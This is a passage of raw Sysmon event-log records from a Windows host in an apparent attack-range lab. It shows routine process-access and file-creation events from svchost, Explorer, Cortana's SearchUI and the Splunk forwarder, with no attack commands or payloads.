23542300x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-64D4-6064-B700-00000000AE01}5704ATTACKRANGE\AdministratorC:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appssynonyms.txtMD5=0159FA2FCDF8F84DB30198B1B3F95415,SHA256=4123D6B7736C9764973415C8F03F58E76FB2FB0A08E8F55CE9165C0C631C955E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.835{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.804{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000007091Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.804{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 11241100x80000000000000007090Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\settingssynonyms.txt2021-03-31 12:02:31.773 11241100x80000000000000007089Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appssynonyms.txt2021-03-31 12:02:31.773 11241100x80000000000000007088Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\settingsconversions.txt2021-03-31 12:02:31.773 11241100x80000000000000007087Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appsconversions.txt2021-03-31 12:02:31.773 11241100x80000000000000007086Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\settingsglobals.txt2021-03-31 12:02:31.773 11241100x80000000000000007085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.773{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{2a817017-4e84-410c-a9e1-61e1780eae6f}\appsglobals.txt2021-03-31 12:02:31.773 10341000x80000000000000007084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.757{266CAFBE-646C-6064-1200-00000000AE01}11961468C:\Windows\system32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\es.dll+14045|c:\windows\system32\es.dll+200bc|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000007083Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.726{266CAFBE-648B-6064-7A00-00000000AE01}4692NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE7CFFC8A5368B8DE3C825A819CA1578,SHA256=A13C642FC4D84A281821A6531285D2AA86391627CAF91D064AE6A1C056B56A9C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000007082Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.711{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exeC:\Users\Administrator\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache132616657513042175.txt2021-03-31 12:02:31.711 10341000x80000000000000007081Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.711{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+ab790|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000007080Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.711{266CAFBE-64C5-6064-A500-00000000AE01}43561356C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+ab271|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF802866D78C8)|UNKNOWN(FFFFD463B70B4A38)|UNKNOWN(FFFFD463B70B4BB7)|UNKNOWN(FFFFD463B70AF241)|UNKNOWN(FFFFD463B70B0C0A)|UNKNOWN(FFFFD463B70AEEC6)|UNKNOWN(FFFFF802863EEE03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+aeffb|C:\Windows\System32\SHELL32.dll+5567a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007079Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007078Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+72b5|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000007077Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007076Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007075Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\System32\TwinUI.dll+acea6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007074Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.695{266CAFBE-64C4-6064-9C00-00000000AE01}46204256C:\Windows\system32\sihost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\twinui.appcore.dll+684b|C:\Windows\System32\twinui.appcore.dll+564d|C:\Windows\System32\twinui.appcore.dll+4d5e|C:\Windows\system32\activationmanager.dll+8469|C:\Windows\system32\activationmanager.dll+b6c7|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\